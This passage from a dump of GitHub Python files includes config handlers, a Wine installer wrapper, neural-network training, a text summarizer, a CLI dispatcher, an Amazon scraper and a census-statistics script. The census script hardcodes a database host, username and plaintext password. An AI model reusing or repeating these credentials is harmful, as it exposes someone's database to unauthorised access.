load_string(source_text, source_format)\n    return params\n\n\ndef get_file_handler(directory: Union[PathLike, str] = DEFAULT_PATH, key: bytes = None) -> LoadingHandler:\n    \"\"\"\n    Get a handler for loading configuration data from a file.\n\n    :param directory: The directory where the configuration file is located. Defaults to the current directory.\n    :type directory: Union[PathLike, str]\n    :param key: Optional encryption key for encrypted configuration files. 
Defaults to None.\n :type key: bytes, optional\n :return: A callable that takes a dictionary containing parameters for loading configuration data\n from a file, and returns a dictionary containing the loaded configuration data under\n the KEY_RESULT key.\n :rtype: LoadingHandler\n :raises: NotADirectoryError if the specified directory does not exist.\n \"\"\"\n directory = Path(directory)\n if not directory.exists():\n critical(str(directory), NotADirectoryError)\n\n if key is not None:\n load = partial(load_encrypted_file, key=key)\n else:\n load = load_file\n\n def handler(params: dict) -> dict:\n file_path = directory / get_argument(params, 'path', DEFAULT_CONFIG_PATH)\n params['full_path'] = file_path\n params[KEY_RESULT] = load(file_path)\n return params\n\n return handler\n\n\ndef _find_suitable_file(directory: Path, config_name: str) -> str:\n \"\"\"\n Find a suitable configuration file in the specified directory.\n\n :param directory: The directory where the configuration files are located. Defaults to the current directory.\n :type directory: Union[PathLike, str]\n :param config_name: The name of the configuration file.\n :type config_name: str\n :return: The name of the configuration file found in the directory.\n :rtype: str\n :raises: FileNotFoundError if no suitable configuration file is found in the directory.\n \"\"\"\n for filename in os.listdir(directory):\n if isinstance(filename, bytes):\n filename = filename.decode()\n\n if filename == config_name:\n return config_name\n\n if filename.split('.')[0] == config_name:\n return filename\n raise FileNotFoundError(f'Cannot find a suitable configuration file for \"{config_name}\" in \"{str(directory)}\".')\n\n\ndef get_find_suitable_file_handler(directory: Union[PathLike, str] = DEFAULT_PATH) -> LazyHandler:\n \"\"\"\n Get a handler for finding a suitable configuration file.\n\n :param directory: The directory where the configuration files are located. 
Defaults to the current directory.\n :type directory: Union[PathLike, str]\n :return: A callable that takes a dictionary containing parameters for finding a suitable configuration file,\n and returns a dictionary containing the path of the configuration file found in the directory.\n :rtype: LazyHandler\n :raises: NotADirectoryError if the specified directory does not exist.\n \"\"\"\n directory = Path(directory)\n if not directory.exists():\n critical(str(directory), NotADirectoryError)\n\n def handler(params: dict) -> dict:\n config_name = get_argument(params, 'name')\n params['path'] = _find_suitable_file(directory, config_name)\n return params\n\n return handler\n","repo_name":"Leikt/gemtools-config","sub_path":"src/gemtoolsconfig/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8422472609","text":"import os\nimport glob\n\nimport Project\nimport Tools\nimport Qt\nimport Git\nimport Svn\n\nclass Wine:\n def __init__(self):\n if Tools.isLinuxOS():\n self.wine = 'wine'\n self.prefix = '%s/.wine' % ( os.environ[ 'HOME' ] )\n elif Tools.isMacOS():\n self.wine = '/Applications/Wine.app/Contents/Resources/bin/wine'\n self.prefix = '%s/Wine Files' % ( os.environ[ 'HOME' ] )\n elif Tools.isWindowsOS():\n '''No wine needed'''\n \n self.rootDrive = 'z:'\n self.drive = '%s/drive_c' % ( self.prefix )\n self.programFiles = '%s/Program Files' % ( self.drive )\n \n def start(self, command, workingDirectory = None):\n return Tools.execute( '\"%s\" %s' % ( self.wine, command ), workingDirectory )\n \n def iscc(self, scriptFile, workingDirectory = None):\n return self.start( '\"%s/Inno Setup 5/ISCC.exe\" \"%s\"' % ( self.programFiles, scriptFile ), workingDirectory )\n \n def isccInstall(self, filePath):\n if not os.path.exists( filePath ):\n return False\n return self.start( '\"%s%s\" /silent' % ( self.rootDrive, filePath ) )\n \n def isccUninstall(self, filePath):\n if not os.path.exists( filePath ):\n return False\n if os.path.isdir( filePath ):\n for file in glob.glob( '%s/unins*.exe' % ( filePath ) ):\n if not self.isccUninstall( file ):\n return False\n return True\n else:\n return self.start( '\"%s%s\" /silent' % ( self.rootDrive, filePath ) )\n \n def isccSetupToZip(self, setupFilePath, zipFilePath, defaultInstallDirectory):\n pf = '%s/%s' % ( self.programFiles, defaultInstallDirectory )\n sl = os.path.splitext( zipFilePath )[ 0 ]\n self.isccUninstall( pf )\n if not self.isccInstall( setupFilePath ):\n return False\n ok = Tools.createSymLink( pf, sl )\n if ok:\n ok = Tools.zipFolder( sl, zipFilePath, exclude = '*unins*.*' )\n Tools.deleteIfExists( sl )\n self.isccUninstall( pf )\n return ok\n \n def expandVariables(self):\n os.environ[ 'WINE_BINARY' ] = self.wine\n os.environ[ 'WINEPREFIX' ] = self.prefix # official used variable by wine binary\n os.environ[ 'WINE_PREFIX' ] = self.prefix\n os.environ[ 'WINE_ROOT_DRIVE' ] = self.rootDrive\n os.environ[ 'WINE_DRIVE' ] = self.drive\n os.environ[ 'WINE_PROGRAM_FILES' ] = self.programFiles","repo_name":"pasnox/monkeystudio2","sub_path":"tools/project_releaser/src/Wine.py","file_name":"Wine.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"9505356405","text":"# SNN's Training :\r\n\r\nimport numpy as np\r\nimport utility as ut\r\n\r\n\r\n# Save weights and MSE of the SNN\r\ndef save_w_dl(W_ae, W_sf, 
ann_MSE):\r\n np.savez('w_ae.npz', *W_ae)\r\n np.savez('w_sf.npz', W_sf)\r\n np.savetxt(\"costo.csv\", ann_MSE)\r\n\r\n\r\ndef create_momentum(W, L):\r\n W_size = L + 1\r\n V = [None] * W_size\r\n\r\n for i in range(1, W_size):\r\n V[i] = np.zeros_like(W[i])\r\n\r\n return V\r\n\r\n\r\ndef get_minibatch(x, y, n, M):\r\n lower_bound = n * M\r\n upper_bound = (n + 1) * M\r\n\r\n x_batch = x[:, lower_bound: upper_bound]\r\n y_batch = y[:, lower_bound: upper_bound]\r\n\r\n return x_batch, y_batch\r\n\r\n\r\ndef cross_entropy_cost(a, y):\r\n M = y.shape[1]\r\n cost = - (np.sum(y * np.log(a)) / M)\r\n return cost\r\n\r\n\r\n# Calculate Softmax\r\ndef softmax(z):\r\n exp_z = np.exp(z - np.max(z))\r\n return exp_z / exp_z.sum(axis=0, keepdims=True)\r\n\r\n\r\n# Training miniBatch for softmax\r\ndef train_sft_batch(x, y, W, V, S, param):\r\n N = x.shape[1]\r\n M = param['M_batch']\r\n nBatch = N // M\r\n mse = []\r\n\r\n for n in range(nBatch):\r\n xe, ye = get_minibatch(x, y, n, M)\r\n\r\n z = W @ xe\r\n act = softmax(z)\r\n e = ye - act\r\n costo = cross_entropy_cost(act, ye)\r\n mse.append(costo)\r\n\r\n gW = - ((e @ xe.T) / M)\r\n W, V, S = ut.applyAdam(param['mu'], V, S, gW, W, n)\r\n\r\n return W, V, S, mse\r\n\r\n\r\n# Softmax's training via SGD with Momentum\r\ndef train_softmax(x, y, param):\r\n W = ut.iniW(y.shape[0], x.shape[0])\r\n V = np.zeros_like(W)\r\n S = np.zeros_like(W)\r\n Costo = []\r\n\r\n for i in range(param['max_iter']):\r\n idx = np.random.permutation(x.shape[1])\r\n xe, ye = x[:, idx], y[:, idx]\r\n W, V, S, cost = train_sft_batch(xe, ye, W, V, S, param)\r\n\r\n Costo.append(np.mean(cost))\r\n\r\n if (i % 50) == 0:\r\n print(i, Costo[-1])\r\n\r\n return W, Costo\r\n\r\n\r\ndef init_ann(hidden_nodes, d, m):\r\n \"\"\"\r\n Initialize an ANN with its variables saved into a map.\r\n :param hidden_nodes: List with the nodes quantity by layer.\r\n :param d: Size of the input\r\n :param m: Size of the output\r\n \"\"\"\r\n ann = ut.create_ann(hidden_nodes)\r\n ann['W'] = ut.iniWs(ann['W'], ann['L'], d, m, hidden_nodes)\r\n\r\n return ann\r\n\r\n\r\n# miniBatch-SGDM's Training\r\ndef trn_minibatch(x, y, ann, param, V, S):\r\n N = x.shape[1]\r\n M = param['M_batch']\r\n nBatch = N // M\r\n mse = []\r\n for n in range(nBatch):\r\n xe, ye = get_minibatch(x, y, n, M)\r\n\r\n act = ut.forward(ann, param, xe)\r\n e = act - ye\r\n costo = ut.get_mse(act, ye)\r\n mse.append(costo)\r\n de_dw = ut.gradW(ann, param, e)\r\n ann['W'], V, S = ut.updWV_rmsprop(ann, param, de_dw, V, S, n)\r\n\r\n return ann['W'], V, S, mse\r\n\r\n\r\n# SAE's Training\r\ndef train_sae(X, param_ae):\r\n d, N = X.shape\r\n ae = init_ann(param_ae['ae_nodes'], d, d)\r\n V = create_momentum(ae['W'], ae['L'])\r\n S = create_momentum(ae['W'], ae['L'])\r\n\r\n for i in range(param_ae['max_iter']):\r\n xe = X[:, np.random.permutation(N)]\r\n ae['W'], V, S, mse = trn_minibatch(xe, xe, ae, param_ae, V, S)\r\n\r\n if (i % 10) == 0:\r\n print(i, np.mean(mse))\r\n\r\n a = X.copy()\r\n for l in range(1, param_ae['ae_n_layers'] + 1):\r\n a = ut.act_function(param_ae['g_fun'], ae['W'][l] @ a)\r\n \r\n return ae['W'][:param_ae['ae_n_layers'] + 1], a\r\n\r\n\r\n# Load data to train the SNN\r\ndef load_data_trn():\r\n FILE_X = 'dtrn.csv'\r\n FILE_Y = 'etrn.csv'\r\n X_train, y_train = ut.load_data(FILE_X, FILE_Y)\r\n return X_train, y_train\r\n\r\n\r\n# Beginning ...\r\ndef main():\r\n param_ae = ut.load_cnf_ae()\r\n param_soft = ut.load_cnf_softmax()\r\n xe, ye = load_data_trn()\r\n W_ae, xe = train_sae(xe, param_ae)\r\n W_sf, Cost 
= train_softmax(xe, ye, param_soft)\r\n save_w_dl(W_ae, W_sf, Cost)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"DanRivaille/AE-Softmax-Pinversa","sub_path":"trn.py","file_name":"trn.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16908959836","text":"import spacy\nfrom spacy.lang.en.stop_words import STOP_WORDS\nfrom string import punctuation\n# Used to rank sentences according sentence scores\nfrom heapq import nlargest\n\ndef estimated_reading_time(text):\n '''Calculating reading speed by dividing \n text length by average reading speed (avg words per pm)'''\n mins = int(len(text)/200)\n seconds = int((float(len(text)/200) - mins)*60)\n return \"( Estimated reading time: {} mins, {} seconds )\".format(str(mins),str(seconds))\n\ndef summarizer(text):\n '''Summarizes text by tokenizing, creating a word frequency list, \n finding sentence scores, and then selecting sentences with \n highest sentence scores'''\n\n stopwords = list(STOP_WORDS)\n #print(stopwords)\n\n # Loading model for tokenization\n nlp = spacy.load('en_core_web_sm')\n\n # Tokenizing text with spacy\n doc = nlp(text)\n\n tokens = [token.text for token in doc]\n #print(tokens)\n\n # Finding Word Frequencies\n word_frequencies = {}\n\n for word in doc:\n if word.text.lower() not in stopwords:\n if word.text.lower() not in punctuation:\n if word.text.lower() not in word_frequencies.keys():\n # Adding new word to word_frequency\n word_frequencies[word.text.lower()] = 1\n else:\n # Incrementing frequency in word already exists\n word_frequencies[word.text.lower()] += 1\n\n #print(word_frequencies)\n\n # Normalizing Word Frequencies\n max_frequency = max(word_frequencies.values())\n #print(max_frequency)\n\n for word in word_frequencies.keys():\n word_frequencies[word] /= max_frequency\n\n #print(word_frequencies)\n\n # Sentence Tokenization\n sentence_tokens = [sent for sent in doc.sents]\n #print(sentence_tokens)\n\n # Calculating sentence scores\n sentence_scores = {}\n\n for sent in sentence_tokens:\n for word in sent:\n if word.text.lower() in word_frequencies.keys():\n if sent not in sentence_scores.keys():\n sentence_scores[sent] = word_frequencies[word.text.lower()]\n else:\n sentence_scores[sent] += word_frequencies[word.text.lower()]\n\n #print(sentence_scores)\n\n # Getting Sentences with highest scores\n sentences_percent = 0.2\n sentences_selected = int(len(sentence_tokens)*sentences_percent)\n #print(sentences_selected)\n\n #heapq.nlargest(selectCount, iterable, keys )\n summary_sentences = nlargest(sentences_selected, sentence_scores, key = sentence_scores.get)\n #print(summary_sentences)\n summary_sentences = [word.text for word in summary_sentences]\n summary = \" \".join(summary_sentences)\n return summary\n\n","repo_name":"Mohit-Kundu/Text-Summarization-Web-Application","sub_path":"summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"41058442996","text":"#!/usr/bin/env python\n# =============================================================================\n# Minet CLI Endpoint\n# =============================================================================\n#\n# CLI enpoint of the Minet library.\n#\nimport csv\nimport sys\nimport signal\nimport shutil\nimport importlib\nimport multiprocessing\nfrom textwrap import dedent\nfrom argparse import 
(\n ArgumentParser,\n RawTextHelpFormatter\n)\n\nfrom minet.__version__ import __version__\nfrom minet.cli.utils import die\n\nfrom minet.cli.commands import MINET_COMMANDS\n\n# Handling pipes correctly\nsignal.signal(signal.SIGPIPE, signal.SIG_DFL)\n\nSUBPARSERS = {}\n\n# Getting terminal size\nterminal_size = shutil.get_terminal_size()\n\n# Increasing max CSV file limit to avoid pesky issues\ncsv.field_size_limit(sys.maxsize)\n\n# Hiding stack traces on ctrl+c\nsignal.signal(signal.SIGINT, lambda x, y: sys.exit(1))\n\n\ndef custom_formatter(prog):\n return RawTextHelpFormatter(\n prog,\n max_help_position=50,\n width=terminal_size.columns,\n )\n\n\ndef omit(d, key_to_omit):\n nd = {}\n\n for k, v in d.items():\n if k == key_to_omit:\n continue\n\n nd[k] = v\n\n return nd\n\n\ndef get_subparser(o, keys):\n parser = None\n\n for key in keys:\n item = o.get(key)\n\n if item is None:\n return None\n\n parser = item['parser']\n\n if 'subparsers' in item:\n o = item['subparsers']\n else:\n break\n\n return parser\n\n\ndef add_arguments(subparser, arguments):\n for argument in arguments:\n if 'name' in argument:\n subparser.add_argument(argument['name'], **omit(argument, 'name'))\n elif 'flag' in argument:\n subparser.add_argument(argument['flag'], **omit(argument, 'flag'))\n else:\n subparser.add_argument(*argument['flags'], **omit(argument, 'flags'))\n\n\ndef build_description(command):\n description = command['title'] + '\\n' + ('=' * len(command['title']))\n\n description += '\\n\\n' + dedent(command.get('description', ''))\n\n return description\n\n\ndef build_subparsers(parser, index, commands, help='Action to execute', title='actions',\n dest='action', common_arguments=[]):\n\n subparser_index = {}\n\n subparsers = parser.add_subparsers(\n help=help,\n title=title,\n dest=dest\n )\n\n for name, command in commands.items():\n subparser = subparsers.add_parser(\n name,\n description=build_description(command),\n epilog=dedent(command.get('epilog', '')),\n formatter_class=custom_formatter,\n aliases=command.get('aliases', [])\n )\n\n to_index = {\n 'parser': subparser,\n 'command': command,\n 'subparsers': {}\n }\n\n add_arguments(subparser, common_arguments)\n\n if 'arguments' in command:\n add_arguments(subparser, command['arguments'])\n\n if 'subparsers' in command:\n subsubparsers = command['subparsers']\n subcommon_arguments = subsubparsers.get('common_arguments', [])\n\n add_arguments(subparser, subcommon_arguments)\n\n build_subparsers(\n subparser,\n to_index['subparsers'],\n subsubparsers['commands'],\n help=subsubparsers['help'],\n title=subsubparsers['title'],\n dest=subsubparsers['dest'],\n common_arguments=common_arguments + subcommon_arguments\n )\n\n if 'aliases' in command:\n for alias in command['aliases']:\n index[alias] = to_index\n\n index[name] = to_index\n\n return subparsers\n\n\ndef build_parser(commands):\n\n # Building the argument parser\n parser = ArgumentParser(prog='minet')\n\n parser.add_argument('--version', action='version', version='minet %s' % __version__)\n\n subparser_index = {}\n\n subparsers = build_subparsers(parser, subparser_index, commands)\n\n # Help subparser\n help_subparser = subparsers.add_parser('help')\n help_subparser.add_argument('subcommand', help='Name of the subcommand', nargs='*')\n\n return parser, subparser_index\n\n\ndef main():\n\n # Building parser\n parser, subparser_index = build_parser(MINET_COMMANDS)\n\n # Parsing arguments and triggering commands\n args = parser.parse_args()\n\n action = subparser_index.get(args.action)\n\n 
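# Dispatch: run the command's optional pre-check, then lazily import its module and call the action.\n    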
if action is not None:\n\n        # Need to check something?\n        if 'before' in action['command']:\n            action['command']['before']()\n\n        # Lazy loading module for faster startup\n        m = importlib.import_module(action['command']['package'])\n        fn = getattr(m, action['command']['action'])\n\n        fn(args)\n\n    elif args.action == 'help':\n\n        if len(args.subcommand) == 0:\n            parser.print_help()\n            return\n\n        target = get_subparser(subparser_index, args.subcommand)\n\n        if target is None:\n            die('Unknown command \"%s\"' % ' '.join(args.subcommand))\n        else:\n            target.print_help()\n\n    else:\n        parser.print_help()\n\n\nif __name__ == '__main__':\n    multiprocessing.freeze_support()\n    main()\n","repo_name":"AleksiKnuutila/minet-fork","sub_path":"cli/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7033154766","text":"from bs4 import BeautifulSoup\r\nimport requests\r\n\r\nheaders = {\r\n    'User-Agent': 'Mozilla/6.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'\r\n}\r\n\r\nurl = 'https://www.amazon.es/s?k=tarjeta+grafica&i=computers&rh=n%3A667049031%2Cp_36%3A1323857031&s=review-rank&dc&__mk_es_ES=%C3%85M%C3%85%C5%BD%C3%95%C3%91&crid=95HP1H4872EX&qid=1645126858&rnid=1323854031&sprefix=tarjeta+grafica%2Caps%2C87&ref=sr_st_review-rank'\r\npage = requests.get(url, headers=headers)\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\n\r\n#Graphics card name\r\n\r\ntg = soup.find_all('span', class_=\"a-size-medium a-color-base a-text-normal\")\r\n\r\ntarjetas = list()\r\n\r\ncount = 0\r\n\r\nfor i in tg:\r\n    if count < 10: \r\n        tarjetas.append(i.text)\r\n    else:\r\n        break\r\n    count = count + 1\r\n\r\n\r\n\r\n#Rating\r\n\r\nvl = soup.find_all('span', class_=\"a-icon-alt\")\r\n\r\nvaloracion = list()\r\n\r\ncount = 0\r\n\r\nfor i in vl:\r\n    if count < 10:\r\n        valoracion.append(i.text)\r\n    else:\r\n        break\r\n    count = count + 1\r\n\r\n\r\n\r\n#Price\r\n\r\npr = soup.find_all('span', class_=\"a-price-whole\")\r\n\r\nprecios = list()\r\n\r\ncount = 0\r\n\r\nfor i in pr:\r\n\r\n    if count < 10:\r\n        precios.append(i.text)\r\n    else:\r\n        break\r\n    count = count + 1\r\n\r\n\r\n\r\n#Features\r\n\r\ntr = soup.find_all('div', class_=\"sg-col sg-col-0-of-12 sg-col-4-of-16 sg-col-2-of-20 s-padding-right-small\")\r\n\r\ncar = list()\r\ncarac = list()\r\ncount = 1\r\n\r\nfor i in tr:\r\n    if count < 42: \r\n        t = i.find('span', class_= \"a-text-bold\")\r\n        car.append(t.text) \r\n    else:\r\n        break\r\n    count = count + 1\r\n\r\nfor f in range(10):\r\n    carac.append([0]*4)\r\naux = 0\r\nfor t in range(10):\r\n    for c in range(4):\r\n        carac[t][c] = car[aux]\r\n        aux = aux + 1\r\n    \r\n\r\narchivo = open(\"Tarjetas.txt\",\"w\")\r\nfor i in range(10):\r\n    archivo.write( \"NAME: \" + tarjetas[i]+'\\n'+ \"RATING: \"+valoracion[i] + '\\n' +\"PRICE IN EUROS: \" + precios[i] + '\\n')\r\n    archivo.write( \"RAM size  \" + \"RAM type  \" + \"Graphics card  \" + \"Memory speed  \" + '\\n')\r\n    for j in range(4):\r\n        archivo.write(carac[i][j] + \"     \")\r\n    archivo.write('\\n'+ '\\n' + '\\n')  \r\n    \r\n\r\narchivo.close()\r\n","repo_name":"Matiamor/webscraping","sub_path":"TarjetasGraficas/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8734706286","text":"#problem 1290 / convert binary number in a 
linked list to integer\nclass Solution(object):\n def getDecimalValue(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: int\n \"\"\"\n res = 0\n while head:\n res *= 2\n res += head.val\n head = head.next\n return res","repo_name":"digitalladder/leetcode","sub_path":"problem1290.py","file_name":"problem1290.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24024547839","text":"import psycopg2\nimport csv\n\ndef getReferencies(cursor):\n cursor.execute(\"SELECT REFCAT, SECC_CENSAL, IMMB_US_PRN, IMMB_TIPUS, IMMB_TIPUS_PERCENT, UNI_PLURI_CORR, NUM_V, \"\n \"PLURI_NUM_V, ORD, ANYCONST_SUP_V, ANYCONST_ETAPA_SUP_V, AL_V_MAX, AL_IMMB, SEGMENT_100, SEGMENT_10,\"\n \"SUP_SBR, SUP_VIV_SBR, SUP_VIV_IND, SUP_VIV_STR, SUP_TOTAL FROM referencies_alpha;\")\n return cursor.fetchall()\n\ndef getRef(cursor, refcat):\n cursor.execute(\"SELECT * FROM referencies_alpha WHERE REFCAT = '{}';\".format(refcat))\n return cursor.fetchall()\n\n\nconn_string = \"host='prodtestdb.czciosgdrat6.eu-west-1.rds.amazonaws.com' dbname='dbprodtest' user='testuser' password='CICLICAc1cl1c4'\"\nprint(\"Connecting to database\\n\t->%s\" % (conn_string))\nconn = psycopg2.connect(conn_string)\ncursor = conn.cursor()\n\nconjuntRef = set(getReferencies(cursor))\n\nconn.commit()\ncursor.close()\nconn.close()\n\naeg = []\nsaed = []\nsaetc = []\nconjuntRefAEG = 0\nmunicipis = {}\nerror1 = []\nplanolRef = {}\n\nwith open(\"SeccCensals_AEG.csv\") as csvfile:\n ambitreader = csv.reader(csvfile, delimiter=\",\")\n next(ambitreader)\n for i in ambitreader:\n aeg.append(i[0])\n\nwith open(\"SeccCensals_SAED.csv\") as csvfile3:\n ambitreader1 = csv.reader(csvfile3, delimiter=\",\")\n next(ambitreader1)\n for i in ambitreader1:\n saed.append(i[0])\n\nwith open(\"SeccCensals_SAETC.csv\") as csvfile4:\n ambitreader2 = csv.reader(csvfile4, delimiter=\",\")\n next(ambitreader2)\n for i in ambitreader2:\n saetc.append(i[0])\n\nwith open(\"SeccCensals_Municipis_totes.csv\") as csvfile2:\n munireader = csv.reader(csvfile2, delimiter=\";\")\n next(munireader)\n for r in munireader:\n seccCensalsMuni = []\n for r in munireader:\n if r[1] not in municipis:\n municipis[r[1]] = [r[0]]\n else:\n municipis[r[1]].append(r[0])\n\ncountImmb = 0\ncountImmb_VIV = 0\ncountViv = 0\ncountSUP_TOTAL = 0\ncountSUP_SBR = 0\ncountSUP_VIV_SBR = 0\ncountError = 0\ncountImmb_AEG = 0\ncountImmb_VIV_AEG = 0\ncountViv_AEG = 0\ncountSUP_TOTAL_AEG = 0\ncountSUP_SBR_AEG = 0\ncountSUP_VIV_SBR_AEG = 0\ncountError_AEG = 0\ncountImmb_SAED = 0\ncountImmb_VIV_SAED = 0\ncountViv_SAED = 0\ncountSUP_TOTAL_SAED = 0\ncountSUP_SBR_SAED = 0\ncountSUP_VIV_SBR_SAED = 0\ncountError_SAED = 0\ncountImmb_SAETC = 0\ncountImmb_VIV_SAETC = 0\ncountViv_SAETC = 0\ncountSUP_TOTAL_SAETC = 0\ncountSUP_SBR_SAETC = 0\ncountSUP_VIV_SBR_SAETC = 0\ncountError_SAETC = 0\n\n#################################################### Analisi variables #################################################\nfor r in conjuntRef:\n r = list(r)\n if r[4] is not None:\n r[4] = float(r[4])\n if r[15] is not None:\n r[15] = float(r[15])\n if r[16] is not None:\n r[16] = float(r[16])\n if r[17] is not None:\n r[17] = float(r[17])\n if r[18] is not None:\n r[18] = float(r[18])\n if r[19] is not None:\n r[19] = float(r[19])\n if r[6] is not None and r[16] > 0:\n r[6] = int(r[6])\n else:\n r[6] = 0\n if r[1] in aeg and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n r[3] == 
\"IMMB_NO_V\"):\n countImmb_AEG += 1\n countSUP_TOTAL_AEG += r[19]\n countSUP_SBR_AEG += r[15]\n if r[16] > 0:\n countImmb_VIV_AEG += 1\n countViv_AEG += r[6]\n countSUP_VIV_SBR_AEG += r[16]\n if r[1] in saed and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n r[3] == \"IMMB_NO_V\"):\n countImmb_SAED += 1\n countSUP_TOTAL_SAED += r[19]\n countSUP_SBR_SAED += r[15]\n if r[16] > 0:\n countImmb_VIV_SAED += 1\n countViv_SAED += r[6]\n countSUP_VIV_SBR_SAED += r[16]\n if r[1] in saetc and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n r[3] == \"IMMB_NO_V\"):\n countImmb_SAETC += 1\n countSUP_TOTAL_SAETC += r[19]\n countSUP_SBR_SAETC += r[15]\n if r[16] > 0:\n countImmb_VIV_SAETC += 1\n countViv_SAETC += r[6]\n countSUP_VIV_SBR_SAETC += r[16]\n if r[1] != \"\" and r[5] != \"P_CORR\" and r[17]*10 <= r[16] and ((r[3] != \"IMMB_NO_V\" and r[16] > 0) or\n (r[3] == \"IMMB_NO_V\" and r[16] == 0)):\n countImmb += 1\n if r[16] > 0:\n countImmb_VIV += 1\n countViv += r[6]\n countSUP_VIV_SBR += r[16]\n countSUP_TOTAL += r[19]\n countSUP_SBR += r[15]\n\n#################################################### Print #############################################################\nprint(\"TOTAL:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV)\nprint(\"Viv\", end=\": \")\nprint(countViv)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError)\nprint(\"\")\nprint(\"AEG:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb_AEG)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV_AEG)\nprint(\"Viv\", end=\": \")\nprint(countViv_AEG)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL_AEG)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR_AEG)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR_AEG)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError_AEG)\nprint(\"\")\nprint(\"SAED:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb_SAED)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV_SAED)\nprint(\"Viv\", end=\": \")\nprint(countViv_SAED)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL_SAED)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR_SAED)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR_SAED)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError_SAED)\nprint(\"\")\nprint(\"SAETC:\")\nprint(\"Immb\", end=\": \")\nprint(countImmb_SAETC)\nprint(\"Immb_VIV\", end=\": \")\nprint(countImmb_VIV_SAETC)\nprint(\"Viv\", end=\": \")\nprint(countViv_SAETC)\nprint(\"SUP_TOTAL\", end=\": \")\nprint(countSUP_TOTAL_SAETC)\nprint(\"SUP_SBR\", end=\": \")\nprint(countSUP_SBR_SAETC)\nprint(\"SUP_VIV_SBR\", end=\": \")\nprint(countSUP_VIV_SBR_SAETC)\nprint(\"ErrorsIndeterminat i P_CORR\", end=\": \")\nprint(countError_SAETC)\n\n","repo_name":"adriamartinvilaseca/Proves","sub_path":"CountAmbitEstudi.py","file_name":"CountAmbitEstudi.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28342417476","text":"def data_prep(data):\n import pandas as pd\n import numpy as np\n \n filepath = \"../Data/important_50_X.csv\"\n\n imp_var = pd.read_csv(filepath)\n\n NAs_cols = ['NumberOfBankruptciesFiled',\n 'NumberOfBankruptciesDischarged',\n 
'NumberOfBankruptciesDismissed',\n 'NumberOfBankruptciesDisposed',\n 'mortgageinquiriespast3months',\n 'mortgageinquiriespast6months',\n 'HighestbalanceofopenVAloan_1MO',\n 'CumulativebalancesofopenVAloan_1MO',\n '30daylatepast3months_1MO',\n '60daylatethepast3months_1MO',\n '90dayormorelatepast3months_1MO',\n '30daylatepast6months_1MO',\n '60daylatepast6months_1MO',\n '90ormoredaylatepast6months_1MO',\n '30daylatepast12months_1MO',\n '60daylatepast12months_1MO',\n '90dayormorelatepast12months_1MO',\n 'dayspastduecurrently_1MO',\n 'FHAloans_1MO',\n 'openVAloans_1MO',\n 'openFinanceMortgageloans_1MO',\n 'MortgageOpenTradeLines',\n 'MortgageSumPayment',\n 'MortgageSumBalance',\n 'Numberof60DPDwithinthelast12months',\n 'Numberof60DPDwithinthelast18months',\n 'Numberof90DPDwithinthelast12months',\n 'Numberof90DPDwithinthelast18months',\n 'WeeksSinceLastTarget',\n 'DaysSinceLastTarget',\n 'AgeOfOldestOpenAndCurrentRevolvingTrade',\n 'NumOfOpenAndCurrentFinanceTrades',\n 'HighestRevolvingCreditAmount',\n 'KeycodedAggBalCredLimitRatioForOpenRevolvingTrades',\n 'MinBalToCreditOpenAuto',\n 'MaxBalToCreditOpenAuto',\n 'FICOTier',\n 'TargetedInLast30',\n 'TargetedInLast60',\n 'TargetedInLast90',\n 'TargetedInLast180',\n 'TimesTargetedLast30',\n 'TimesTargetedLast60',\n 'TimesTargetedLast90',\n 'TimesTargetedLast180',\n 'TimesTargeted',\n 